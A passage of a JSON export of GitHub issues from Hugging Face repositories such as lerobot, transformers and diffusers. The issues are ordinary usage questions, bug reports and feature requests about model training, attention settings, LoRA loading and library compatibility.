subset of an episode (ie sec 2-4) in a 30 second episode, and wanted to know how episode_stats are used later on for training / inference? \nAre they used to normalize model inputs or are they used somewhere else as well? \n\nie. 
in modeling_act.py\n```\nself.normalize_inputs = Normalize(\n config.input_features, config.normalization_mapping, dataset_stats)\n```\n", "url": "https://github.com/huggingface/lerobot/issues/1564", "state": "closed", "labels": [ "question", "policies", "processor" ], "created_at": "2025-07-21T19:06:21Z", "updated_at": "2025-08-12T09:27:29Z", "user": "andlyu" }, { "repo": "huggingface/lerobot", "number": 1561, "title": "Will you release the LIBERO finetune & eval settings?", "body": "Hello, your SmolVLA is wonderful work. I noticed that you finetuned it on **LIBERO** and evaluated it at the same time, but I couldn't achieve the same or a similar success rate **(just 76%, much lower than your 96%)**.\n**Did you use async inference on LIBERO?**\nI think it must come down to hyperparameters that differ from yours, so could you release the scripts (finetune.py & eval.py) or just tell me your finetune & eval settings? Here is my email: 602225349@qq.com\nThanks in advance~", "url": "https://github.com/huggingface/lerobot/issues/1561", "state": "closed", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-21T13:57:13Z", "updated_at": "2025-09-23T09:25:04Z", "user": "JuilieZ" }, { "repo": "huggingface/transformers", "number": 39554, "title": "Why is `is_causal` not used in `flash_attention_forward`?", "body": "I want to perform bidirectional attention in the Qwen3 model to train an embedding model, so I passed `is_causal=False` in the model `forward` (I manually added `is_causal` arguments to all `forward` methods such as `Qwen3Model` and `Qwen3Attention` in `modeling_qwen3.py`):\n\n```python\nclass Qwen3Attention(nn.Module):\n \"\"\"Multi-headed attention from 'Attention Is All You Need' paper\"\"\"\n ...\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n position_embeddings: tuple[torch.Tensor, torch.Tensor],\n attention_mask: Optional[torch.Tensor],\n past_key_value: Optional[Cache] = None,\n cache_position: Optional[torch.LongTensor] = None,\n is_causal: Optional[bool] = True, # I added is_causal here\n **kwargs: Unpack[FlashAttentionKwargs],\n ) -> tuple[torch.Tensor, Optional[torch.Tensor], Optional[tuple[torch.Tensor]]]:\n ...\n\n attn_output, attn_weights = attention_interface(\n self,\n query_states,\n key_states,\n value_states,\n attention_mask,\n dropout=0.0 if not self.training else self.attention_dropout,\n scaling=self.scaling,\n sliding_window=self.sliding_window, # diff with Llama\n is_causal=is_causal, # and is_causal from the argument is passed to the attention_interface (e.g. `flash_attention_2`, `sdpa_attention_forward`)\n **kwargs,\n )\n```\n \nI can successfully change the causality of the attention in `sdpa_attention_forward`. However, I realized that it does not change the causality of the attention in `flash_attention_forward`. 
After diving into the implementation of `flash_attention_forward`, I found the reason in `flash_attention_forward` located at `transformers/integrations/flash_attention.py`:\n\n```python\ndef flash_attention_forward(\n module: torch.nn.Module,\n query: torch.Tensor,\n key: torch.Tensor,\n value: torch.Tensor,\n attention_mask: Optional[torch.Tensor],\n dropout: float = 0.0,\n scaling: Optional[float] = None,\n sliding_window: Optional[int] = None,\n softcap: Optional[float] = None,\n **kwargs,\n) -> tuple[torch.Tensor, None]:\n ...\n\n # FA2 always relies on the value set in the module, so remove it if present in kwargs to avoid passing it twice\n kwargs.pop(\"is_causal\", None)\n\n attn_output = _flash_attention_forward(\n query,\n key,\n value,\n attention_mask,\n query_length=seq_len,\n is_causal=module.is_causal, # here module is `Qwen3Attention`\n dropout=dropout,\n softmax_scale=scaling,\n sliding_window=sliding_window,\n softcap=softcap,\n use_top_left_mask=_use_top_left_mask,\n target_dtype=target_dtype,\n attn_implementation=module.config._attn_implementation,\n **kwargs,\n )\n```\n\nAs you can see, the `is_causal` argument is popped, and the `is_causal` of `Qwen3Attention` is used as the argument. Note that `Qwen3Attention.is_causal` is never changed, and its default value is `True`, so the `is_causal` argument passed into `_flash_attention_forward` will always be `True` regardless of any change. \n\nAfter I add a line of code to alter the `Qwen3Attention.is_causal`, i.e. `self.is_causal = is_causal` before passing the arguments into `attention_interface`, I can change the causality of `flash_attention_forward`. So I would like to know if it is a feature or a bug? Thank you!!", "url": "https://github.com/huggingface/transformers/issues/39554", "state": "closed", "labels": [ "Flash Attention" ], "created_at": "2025-07-21T12:08:00Z", "updated_at": "2025-11-11T12:32:41Z", "comments": 9, "user": "lucaswychan" }, { "repo": "huggingface/peft", "number": 2660, "title": "Custom models LoRA", "body": " Is there any way to fine-tune models that are not in the support list or custom models?\n\nCurrently, many public models have their LLM parts from Qwen. Can LLaMA-Factory use the Qwen template and only fine-tune the LLM part? Thank you", "url": "https://github.com/huggingface/peft/issues/2660", "state": "closed", "labels": [], "created_at": "2025-07-21T11:52:30Z", "updated_at": "2025-07-24T12:53:34Z", "comments": 6, "user": "stillbetter" }, { "repo": "huggingface/lerobot", "number": 1559, "title": "Is the current model framework suitable for using automatic mixed precision?", "body": "I saw that `.to(torch.float32)` and `.to(torch.bfloat16)` were used in many places in the Pi0 model code. Then I implemented parallel training of Pi0 based on accelerate, and found that if I want to use AMP, the code will report an error of dtype mismatch. I want to know whether the existing code is suitable for automatic mixed precision? 
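\n\nFor reference, the pattern that triggers the mismatch is the standard accelerate one; a toy version (a stand-in model, not Pi0) runs cleanly, which suggests the explicit `.to(dtype)` casts inside the model are what conflict with autocast's per-op dtype choices:\n\n```python\nimport torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader, TensorDataset\nfrom accelerate import Accelerator\n\naccelerator = Accelerator(mixed_precision=\"bf16\")\nmodel = nn.Sequential(nn.Linear(16, 32), nn.GELU(), nn.Linear(32, 1))  # stand-in policy\noptimizer = torch.optim.AdamW(model.parameters(), lr=1e-4)\nloader = DataLoader(TensorDataset(torch.randn(64, 16), torch.randn(64, 1)), batch_size=8)\nmodel, optimizer, loader = accelerator.prepare(model, optimizer, loader)\n\nfor x, y in loader:\n    with accelerator.autocast():  # ops run in bf16/fp32 as autocast decides\n        loss = nn.functional.mse_loss(model(x), y)\n    accelerator.backward(loss)\n    optimizer.step()\n    optimizer.zero_grad()\n```\n\n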
If not, how should it be modified?", "url": "https://github.com/huggingface/lerobot/issues/1559", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-21T10:45:26Z", "updated_at": "2025-08-12T09:27:59Z", "user": "xliu0105" }, { "repo": "huggingface/transformers", "number": 39549, "title": "Is there a plan to integrate ColQwen2.5 into Transformers?", "body": "### Model description\n\nIs ColQwen2ForRetrieval integrated into the transformers library, and are there plans to add [ColQwen2.5](https://github.com/illuin-tech/colpali/blob/main/colpali_engine/models/qwen2_5/colqwen2_5/modeling_colqwen2_5.py) in the future?\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\nhttps://github.com/illuin-tech/colpali/blob/main/colpali_engine/models/qwen2_5/colqwen2_5/modeling_colqwen2_5.py\n\nhttps://github.com/huggingface/transformers/pull/38391", "url": "https://github.com/huggingface/transformers/issues/39549", "state": "closed", "labels": [ "New model" ], "created_at": "2025-07-21T10:08:47Z", "updated_at": "2025-11-03T23:31:08Z", "comments": 0, "user": "rebel-thkim" }, { "repo": "huggingface/diffusers", "number": 11966, "title": "How about forcing the first and last block on device when group offloading is used?", "body": "**Is your feature request related to a problem? Please describe.**\nWhen group offloading is enabled, the offload and onload cannot be streamed between steps, and this is a really big time-consuming problem.\n\n**Describe the solution you'd like.**\nIs it possible to add an option that forces the first and last block to stay on device, avoiding their offload and onload?\n\n@a-r-r-o-w Could you please give some help? Thanks so much.\n", "url": "https://github.com/huggingface/diffusers/issues/11966", "state": "open", "labels": [ "contributions-welcome", "group-offloading" ], "created_at": "2025-07-21T08:38:30Z", "updated_at": "2025-12-02T15:30:23Z", "comments": 13, "user": "seed93" }, { "repo": "huggingface/tokenizers", "number": 1829, "title": "The initial_alphabet parameter of \"class BpeTrainer(Trainer)\" does not allow more than one character to be initialized", "body": "Hi everyone,\nI am working on Tamil and Sinhala, which are morphologically rich languages. In these languages a character is actually a combination of multiple Unicode codepoints (similar to emojis), so it would be greatly beneficial to initialize the BPE alphabet with graphemes instead of characters. Is there any workaround I can use to initialize the BPE algorithm this way? Thanks in advance!!", "url": "https://github.com/huggingface/tokenizers/issues/1829", "state": "open", "labels": [], "created_at": "2025-07-21T08:30:21Z", "updated_at": "2025-07-21T08:30:21Z", "comments": 0, "user": "vmenan" }, { "repo": "huggingface/lerobot", "number": 1554, "title": "How to use local datasets to train and evaluate", "body": "Due to network issues, I want to use only local datasets during training and evaluation and prevent huggingface from uploading data or retrieving datasets from the hub. Is there any good solution? 
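\n\nOne approach that may work (the module path and the `root` argument below reflect the current lerobot layout and should be treated as assumptions):\n\n```python\nimport os\n\n# Refuse all Hub traffic (no downloads, no uploads); set before any HF import.\nos.environ[\"HF_HUB_OFFLINE\"] = \"1\"\nos.environ[\"HF_DATASETS_OFFLINE\"] = \"1\"\n\nfrom lerobot.common.datasets.lerobot_dataset import LeRobotDataset\n\n# `root` points at an already-downloaded copy; with offline mode on,\n# the repo_id is only used as a local identifier.\ndataset = LeRobotDataset(\"my_user/my_dataset\", root=\"/data/lerobot/my_dataset\")\n```\n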
", "url": "https://github.com/huggingface/lerobot/issues/1554", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-07-21T07:54:07Z", "updated_at": "2025-10-08T12:58:32Z", "user": "zym123321" }, { "repo": "huggingface/optimum", "number": 2324, "title": "AutoConfig.from_dict Missing in transformers==4.51.3 \u2014 Incompatibility with optimum==1.26.1", "body": "### System Info\n\n```shell\nI am running into a critical compatibility issue between optimum and recent versions of transformers.\n\n\u2757 Error Summary\nWhen using:\ntransformers==4.51.3\noptimum==1.26.1\nonnx==1.17.0\nonnxruntime==1.20.0\n\nThe following runtime error is thrown when attempting to load an ONNX model using ORTModelForTokenClassification.from_pretrained:\n\nAttributeError: type object 'AutoConfig' has no attribute 'from_dict'\n\nThis traces back to:\nconfig = AutoConfig.from_pretrained(...)\n# \u2193 internally calls:\nreturn CONFIG_MAPPING[pattern].from_dict(config_dict, **unused_kwargs)\n\nHowever, in transformers>=4.48, the method AutoConfig.from_dict appears to have been deprecated or removed. This causes optimum to break at runtime when trying to load ONNX models.\n\n\ud83d\udce6 Package Versions\ntransformers - 4.51.3\noptimum - 1.26.1\nonnx - 1.17.0\nonnxruntime - 1.20.0\ntorch - 2.2.6\n\nDue to a security advisory, we're required to upgrade to transformers>=4.48. However, even with the latest optimum==1.26.1, it appears optimum is not yet updated for compatibility with changes introduced in recent transformers versions.\n\nASK:\nIs support for transformers>=4.48 (particularly 4.51.3) planned in an upcoming optimum release?\nCould this AutoConfig.from_dict dependency be refactored or conditionally patched to restore compatibility?\nIs there a compatibility roadmap available between transformers and optimum for ONNX workflows?\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nUse transformers==4.51.3 and optimum==1.26.1\n\nLoad an exported ONNX model using ORTModelForTokenClassification.from_pretrained(...)\n\nObserve the AttributeError about AutoConfig.from_dict\n\n### Expected behavior\n\nWhen using optimum==1.26.1 with transformers>=4.48 (specifically 4.51.3), the following should work without error:\nfrom optimum.onnxruntime import ORTModelForTokenClassification\nmodel = ORTModelForTokenClassification.from_pretrained(\"path/to/onnx/model\")\n\nThe model should load successfully using the ONNX Runtime backend.\n\nInternally, AutoConfig.from_pretrained(...) 
should function correctly regardless of changes in the transformers API (e.g., deprecation/removal of from_dict).\n\nONNX workflows should remain compatible with newer transformers versions, allowing teams to benefit from critical updates and security patches without breaking ONNX integration.", "url": "https://github.com/huggingface/optimum/issues/2324", "state": "open", "labels": [ "bug" ], "created_at": "2025-07-21T06:04:58Z", "updated_at": "2025-08-01T07:10:20Z", "comments": 5, "user": "rratnakar09" }, { "repo": "huggingface/diffusers", "number": 11964, "title": "KeyError when loading LoRA for Flux model: missing lora_unet_final_layer_adaLN_modulation_1 weights", "body": "I'm trying to run Overlay-Kontext-Dev-LoRA locally by loading the LoRA weights using the pipe.load_lora_weights() function. However, I encountered the following error during execution:\n\n> KeyError: 'lora_unet_final_layer_adaLN_modulation_1.lora_down.weight'\n\n\n```\nimport torch\nfrom diffusers import DiffusionPipeline\nfrom diffusers.utils import load_image\n\nLoad the pipeline with a specific torch data type for GPU optimization\npipe = DiffusionPipeline.from_pretrained(\n\"black-forest-labs/FLUX.1-Kontext-dev\",\ntorch_dtype=torch.bfloat16\n)\n\nMove the entire pipeline to the GPU\npipe.to(\"cuda\")\n\nLoad LoRA weights (this will also be on the GPU)\npipe.load_lora_weights(\"ilkerzgi/Overlay-Kontext-Dev-LoRA\")\n\nprompt = \"Place it\"\ninput_image = load_image(\"img2.png\")\n\nThe pipeline will now run on the GPU\nimage = pipe(image=input_image, prompt=prompt).images[0]\n\nimage.save(\"output_image.png\")\n```\n\n\nEnvironment:\ndiffusers version: 0.35.0.dev0\nPython: 3.10\nRunning locally on a ubuntu environment with RTX 4090\n\n\n\n> Additional Note:\n> The model file size is also quite large. I may need to quantize it before running it on the 4090 to avoid out-of-memory issues.\n> \n> Would appreciate any help or suggestions on how to resolve the loading issue. Thank you!\n\n", "url": "https://github.com/huggingface/diffusers/issues/11964", "state": "open", "labels": [], "created_at": "2025-07-21T05:16:34Z", "updated_at": "2025-07-21T09:14:00Z", "comments": 1, "user": "NEWbie0709" }, { "repo": "huggingface/transformers", "number": 39545, "title": "Is the new Intel\u2013Weizmann speculative decoding algorithm integrated into Transformers?", "body": "Hi,\n\nI recently read about a new speculative decoding algorithm developed by Intel Labs and the Weizmann Institute, which reportedly improves inference speed by up to 2.8\u00d7, even when using draft and target models with different vocabularies or architectures.\n\nReferences:\n\n- [Intel Newsroom](https://newsroom.intel.com/artificial-intelligence/intel-weizmann-institute-speed-ai-with-speculative-decoding-advance?utm_source=chatgpt.com)\n- [CTech Article](https://www.calcalistech.com/ctechnews/article/h1z7pydlex)\n\nSeveral sources (including Intel press releases and third-party writeups) claim that this algorithm has already been integrated into the Hugging Face Transformers library.\nHowever, I haven\u2019t found any reference to this new version in the official Transformers documentation\n\n\nMy Questions:\n\n1. Has this Intel\u2013Weizmann speculative decoding algorithm actually been integrated into transformers?\n2. If so, where can I find documentation or usage examples for how to enable it?\n\nThanks in advance for your help! 
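\n\nFrom what I can tell, this appears to have shipped as \"universal assisted generation\", riding the existing `assistant_model` path and allowing a draft model with a different vocabulary; roughly (the model pairing here is only an example):\n\n```python\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\n\ntarget_id, draft_id = \"meta-llama/Llama-3.1-8B-Instruct\", \"Qwen/Qwen2.5-0.5B-Instruct\"\ntarget = AutoModelForCausalLM.from_pretrained(target_id, device_map=\"auto\")\ntarget_tok = AutoTokenizer.from_pretrained(target_id)\ndraft = AutoModelForCausalLM.from_pretrained(draft_id, device_map=\"auto\")\ndraft_tok = AutoTokenizer.from_pretrained(draft_id)\n\ninputs = target_tok(\"The capital of France is\", return_tensors=\"pt\").to(target.device)\n# With mismatched vocabularies, generate() needs both tokenizers so drafted\n# tokens can be re-encoded between the two models.\nout = target.generate(**inputs, assistant_model=draft, tokenizer=target_tok,\n                      assistant_tokenizer=draft_tok, max_new_tokens=32)\nprint(target_tok.decode(out[0], skip_special_tokens=True))\n```\n\n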
This looks like a powerful advancement, and I'd love to test it.", "url": "https://github.com/huggingface/transformers/issues/39545", "state": "closed", "labels": [], "created_at": "2025-07-21T02:47:48Z", "updated_at": "2025-07-22T12:15:54Z", "comments": 4, "user": "NEWbie0709" }, { "repo": "huggingface/lerobot", "number": 1552, "title": "Support smolvla training on Intel GPU", "body": "Current script is only supporting `cuda`, `mps` and `cpu`. \nWith PyTorch 2.7 with Intel GPU support, once PyTorch is installed, Intel GPU can be utilized in the training script.", "url": "https://github.com/huggingface/lerobot/issues/1552", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-21T01:47:38Z", "updated_at": "2025-10-09T07:40:10Z", "user": "xiangyang-95" }, { "repo": "huggingface/transformers", "number": 39542, "title": "ValueError: You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time", "body": "### System Info\n\n- `transformers` version: 4.53.2\n- Platform: **Ubuntu 22.04** Linux 5.15.0-139-generic\n- **Python 3.10.18** + ipykernel 6.29.5\n- Pytorch 2.7.1+cu118\n\n### Who can help?\n\n@ArthurZucker \n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n I want to build a new MT model with **bert-based encoder** and a **decoder from opus-mt-en-zh** (loaded as `MarianMTModel`), BUT when I execute `Trainer.train()`, It report ValueError: `You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time`. This is code about my model and trainer.\n Thanks for helping!\n\n```Python\n# ManchuBERT Encoder + Opus-MT-zh Decoder\n\nimport torch\nfrom torch import nn\nfrom transformers.modeling_outputs import Seq2SeqLMOutput\n\n\ndef get_extended_attention_mask(attention_mask, input_shape, device, dtype=torch.float32):\n \"\"\"\n attention_mask: [B, seq_len] \n return: [B, 1, 1, seq_len] \n \"\"\"\n mask = attention_mask[:, None, None, :] # [B, 1, 1, seq_len]\n mask = mask.to(dtype=dtype)\n mask = (1.0 - mask) * -10000.0\n return mask\n\n\nclass ManchuZhMT(nn.Module):\n def __init__(self, bert, marian):\n super().__init__()\n self.decoder_embeddings = marian.model.decoder.embed_tokens\n self.embeddings = bert.embeddings\n self.encoder = bert.encoder\n self.decoder = marian.model.decoder\n self.lm_head = marian.lm_head\n self.final_logits_bias = marian.final_logits_bias\n self.config = marian.config\n\n def forward(self,\n input_ids=None,\n attention_mask=None,\n decoder_input_ids=None,\n decoder_attention_mask=None,\n labels=None,\n **kwargs):\n\n\n hidden_states = self.embeddings(input_ids=input_ids)\n attention_mask = attention_mask.to(dtype=torch.float32)\n\n extended_mask = get_extended_attention_mask(attention_mask, input_ids.shape, input_ids.device)\n\n enc_out = self.encoder(hidden_states=hidden_states,\n attention_mask=extended_mask,\n return_dict=True)\n\n dec_out = self.decoder(\n input_ids=decoder_input_ids,\n attention_mask=decoder_attention_mask,\n encoder_hidden_states=enc_out.last_hidden_state,\n encoder_attention_mask=extended_mask,\n return_dict=True)\n\n logits = self.lm_head(dec_out.last_hidden_state) + self.final_logits_bias\n\n loss = None\n if labels is not None:\n loss_fct = nn.CrossEntropyLoss(ignore_index=-100)\n loss = loss_fct(logits.view(-1, logits.size(-1)), 
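# flattened to (batch*seq_len, vocab_size) logits against (batch*seq_len,)\n # targets, as CrossEntropyLoss expects; positions labeled -100 are ignored\n 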
labels.view(-1))\n\n return Seq2SeqLMOutput(loss=loss, logits=logits)\n\n def prepare_inputs_for_generation(self, *args, **kwargs):\n return self.decoder.prepare_inputs_for_generation(*args, **kwargs)\n\n def _prepare_encoder_decoder_kwargs_for_generation(self, *args, **kwargs):\n return self.decoder._prepare_encoder_decoder_kwargs_for_generation(*args, **kwargs)\n\nmodel = ManchuZhMT(manchu_model, chn_model)\nprint(model)\n\n# freeze Decoder + LM Head \nfor p in model.decoder.parameters():\n p.requires_grad = False\nfor p in model.lm_head.parameters():\n p.requires_grad = False\n```\n\n```Python\n# Add LoRA for Encoder\nfrom peft import LoraConfig, get_peft_model, TaskType\n\nnum_layers = len(model.encoder.layer)\ntarget_modules = []\nfor i in range(num_layers):\n target_modules.extend([\n f\"encoder.layer.{i}.attention.self.query\",\n f\"encoder.layer.{i}.attention.self.key\",\n f\"encoder.layer.{i}.attention.self.value\",\n f\"encoder.layer.{i}.attention.output.dense\",\n f\"encoder.layer.{i}.intermediate.dense\",\n f\"encoder.layer.{i}.output.dense\",\n ])\n\nlora_config = LoraConfig(\n task_type=TaskType.SEQ_2_SEQ_LM, \n target_modules=target_modules,\n r=16,\n lora_alpha=32,\n lora_dropout=0.05,\n bias=\"none\",\n)\nmodel = get_peft_model(model, lora_config)\nmodel.print_trainable_parameters()\n```\n\n```Python\n# Start Train!\nfrom transformers import Seq2SeqTrainer, Seq2SeqTrainingArguments\n\nargs = Seq2SeqTrainingArguments(\n output_dir=\"./lora_with_bert\",\n per_device_train_batch_size=batch_size,\n per_device_eval_batch_size=batch_size,\n num_train_epochs=10,\n learning_rate=3e-4,\n fp16=True,\n save_strategy=\"epoch\",\n predict_with_generate=True,\n logging_steps=100,\n report_to=\"none\",\n)\n\ntrainer = Seq2SeqTrainer(\n model=model,\n args=args,\n train_dataset=tokenized_ds[\"train\"],\n eval_dataset=tokenized_ds[\"val\"],\n tokenizer=manchu_tok,\n)\ntrainer.train()\ntrainer.save_model(\"./lora_with_bert/final\")\n```\n\n\n### Expected behav", "url": "https://github.com/huggingface/transformers/issues/39542", "state": "closed", "labels": [ "Usage", "Good First Issue", "trainer", "bug" ], "created_at": "2025-07-21T01:06:27Z", "updated_at": "2025-08-22T05:53:51Z", "comments": 10, "user": "xjackzenvey" }, { "repo": "huggingface/transformers", "number": 39551, "title": "InformerForPrediction [I would like to seek your opinions, everyone, How can I set the dynamic real features for prediction]", "body": "Here is the description cited from the docs of InformerForPrediction\uff1a\n\n> future_time_features (torch.FloatTensor of shape (batch_size, prediction_length, num_features)) \u2014 Required time features for the prediction window, which the model internally will add to future_values. These could be things like \u201cmonth of year\u201d, \u201cday of the month\u201d, etc. encoded as vectors (for instance as Fourier features). These could also be so-called \u201cage\u201d features, which basically help the model know \u201cat which point in life\u201d a time-series is. Age features have small values for distant past time steps and increase monotonically the more we approach the current time step. Holiday features are also a good example of time features.\nThese features serve as the \u201cpositional encodings\u201d of the inputs. So contrary to a model like BERT, where the position encodings are learned from scratch internally as parameters of the model, the Time Series Transformer requires to provide additional time features. 
The Time Series Transformer only learns additional embeddings for static_categorical_features.\nAdditional dynamic real covariates can be concatenated to this tensor, with the caveat that these features must but known at prediction time.\nThe num_features here is equal to config.num_time_features+config.num_dynamic_real_features`.\nHi, I have a question regarding inference in time series forecasting models.\n\nWhen making predictions, how can I obtain or construct the dynamic_real_features for the future steps (i.e., for the prediction_length)?\nMore specifically, how should I concatenate the corresponding dynamic_real_features and time_features during inference?\n\nIs it appropriate to use all-zero placeholders for the future dynamic_real_features?\nWill this affect prediction performance, considering that during training the model has access to real values for these features over the full context + prediction window?\n\nOn a related note:\nIn time series forecasting, is it necessary for all timestamps in the input window to be equally spaced (e.g., every x minutes)?\nOr can I use sequences with irregular time intervals, as long as the time order is preserved?\n\nThanks for your help!\n\n\n", "url": "https://github.com/huggingface/transformers/issues/39551", "state": "closed", "labels": [], "created_at": "2025-07-20T11:38:50Z", "updated_at": "2025-08-28T08:03:20Z", "user": "2004learner" }, { "repo": "huggingface/diffusers", "number": 11961, "title": "New Adapter/Pipeline Request: IT-Blender for Creative Conceptual Blending", "body": "## Model/Pipeline/Scheduler description\n\n### Name of the model/pipeline/scheduler\n\"Image-and-Text Concept Blender\" (IT-Blender), a diffusion adapter that blends visual concepts from a real reference image with textual concepts from a prompt in a disentangled manner. The goal is to enhance human creativity in design tasks.\n\n### Project page & ArXiv link\nPaper link: https://arxiv.org/pdf/2506.24085\nThe project website: https://imagineforme.github.io/ \n**(a lot of interesting feasible examples are in the project page.)**\n
\n\n\"Image\"\n\n### What is the proposed method?\n\nIT-Blender is an adapter that works with existing models like SD and FLUX. Its core innovation is the **Blended Attention (BA)** module. This module modifies the standard self-attention layers. It uses a two-stream approach (a noisy stream for generation and a clean reference stream for the image) and introduces trainable parameters within an Image Cross-Attention (imCA) term to bridge the distributional shift between clean and noisy latents.\n\n### Is the pipeline different from an existing pipeline?\nYes. The IT-Blender pipeline is distinct for a few reasons:\n1. **Native Image Encoding**: It uses the diffusion model's own denoising network to encode the reference image by forwarding a clean version at \"t=0\". This avoids an external image encoder to better preserve details.\n2. **Two-Stream Processing**: During training and inference, it processes a \"noisy stream\" for the text-guided generation and a \"reference stream\" for the clean visual concept image simultaneously.\n3. **Blended Attention Integration**: The pipeline replaces standard self-attention modules with the new Blended Attention (BA) module, which is designed to physically separate textual and visual concept processing.\n\n### Why is this method useful?\nThe method is particularly effective for creative tasks like product design, character design, and graphic design, as shown by the extensive examples in the paper and project page. We believe it would be a valuable and unique addition to the `diffusers` library.\n\n### Open source status\n\n- [x] The model implementation is available.\n- [x] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n**Demo page**: https://huggingface.co/spaces/WonwoongCho/IT-Blender\n**GitHub page for inference**: https://github.com/WonwoongCho/IT-Blender\nNote that we are using our own diffusers with a little bit of changes (`requirements.txt` in the github repo);\n\n**Changed Diffusers Pipeline for FLUX**: https://github.com/WonwoongCho/diffusers/blob/main/src/diffusers/pipelines/flux/pipeline_flux.py\n**Changed Diffusers Pipeline for SD1.5**: https://github.com/WonwoongCho/diffusers/blob/main/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py\n", "url": "https://github.com/huggingface/diffusers/issues/11961", "state": "open", "labels": [], "created_at": "2025-07-20T03:07:38Z", "updated_at": "2025-07-20T03:08:06Z", "comments": 0, "user": "WonwoongCho" }, { "repo": "huggingface/transformers", "number": 39522, "title": "T5Gemma failing on provided example", "body": "### System Info\n\n- `transformers` version: 4.53.2\n- Platform: Linux-6.14.0-23-generic-x86_64-with-glibc2.41\n- Python version: 3.13.3\n- Huggingface_hub version: 0.33.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.8.1\n- Accelerate config: \t- compute_environment: LOCAL_MACHINE\n\t- distributed_type: NO\n\t- mixed_precision: bf16\n\t- use_cpu: False\n\t- debug: False\n\t- num_processes: 1\n\t- machine_rank: 0\n\t- num_machines: 1\n\t- gpu_ids: all\n\t- rdzv_backend: static\n\t- same_network: True\n\t- main_training_function: main\n\t- enable_cpu_affinity: True\n\t- downcast_bf16: no\n\t- tpu_use_cluster: False\n\t- tpu_use_sudo: False\n\t- tpu_env: []\n\t- dynamo_config: {'dynamo_backend': 'INDUCTOR'}\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu128 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version 
(CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 5060 Ti\n\n### Who can help?\n\n@ArthurZucker and @itazap \n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nRun the example from the T5Gemma docs page.\n```\necho -e \"Question: Why is the sky blue? Answer:\" | transformers run --task text2text-generation --model google/t5gemma-s-s-ul2 --device 0\n```\n\n### Expected behavior\n\nWhen I run I get:\n```\nFile \".venv/lib/python3.13/site-packages/transformers/configuration_utils.py\", line 209, in __getattribute__\n return super().__getattribute__(key)\n ~~~~~~~~~~~~~~~~~~~~~~~~^^^^^\nAttributeError: 'T5GemmaConfig' object has no attribute **'vocab_size'**\n```\nIndeed. The vocab_size is a sub attribute from encoder/decoder, not a direct attribute.\n", "url": "https://github.com/huggingface/transformers/issues/39522", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-19T11:07:26Z", "updated_at": "2025-08-27T07:51:08Z", "comments": 7, "user": "jadermcs" }, { "repo": "huggingface/lerobot", "number": 1540, "title": "Controlling robot with text using SmolVLA", "body": "Is it possible to control the robot with text inputs? I thought that's what a VLA model was...\n\nI cannot find any instructions on how to do this anywhere... \n\nI found this https://huggingface.co/masato-ka/smolvla_block_instruction , but control_robot was split into multiple files recently - none of which seem to work.\n\n", "url": "https://github.com/huggingface/lerobot/issues/1540", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-18T23:09:11Z", "updated_at": "2025-08-12T09:35:59Z", "user": "drain-pipe" }, { "repo": "huggingface/diffusers", "number": 11956, "title": "Frequency-Decoupled Guidance (FDG) for diffusion models", "body": "FDG is a new method for applying CFG in the frequency domain. It improves generation quality at low CFG scales while inherently avoiding the harmful effects of high CFG values. It could be a nice addition to the guiders part of diffusers. 
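\n\nIn spirit, the method splits the noise prediction by frequency band and applies a different guidance scale to each; a rough sketch of that idea with a single pyramid level (scales illustrative, not the authors' code):\n\n```python\nimport torch\nimport torch.nn.functional as F\n\ndef fdg_guidance(noise_uncond, noise_text, w_low=2.0, w_high=7.5):\n    # One Laplacian-pyramid level: blur/downsample then upsample = low band.\n    def lowpass(x):\n        down = F.avg_pool2d(x, kernel_size=2)\n        return F.interpolate(down, scale_factor=2, mode=\"bilinear\", align_corners=False)\n\n    low_u, low_t = lowpass(noise_uncond), lowpass(noise_text)\n    high_u, high_t = noise_uncond - low_u, noise_text - low_t\n    # Per-band CFG: weaker guidance on low frequencies (global structure),\n    # stronger on high frequencies (detail), then recombine.\n    low = low_u + w_low * (low_t - low_u)\n    high = high_u + w_high * (high_t - high_u)\n    return low + high\n\neps_uncond, eps_text = torch.randn(1, 4, 64, 64), torch.randn(1, 4, 64, 64)\nguided = fdg_guidance(eps_uncond, eps_text)\n```\n\n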
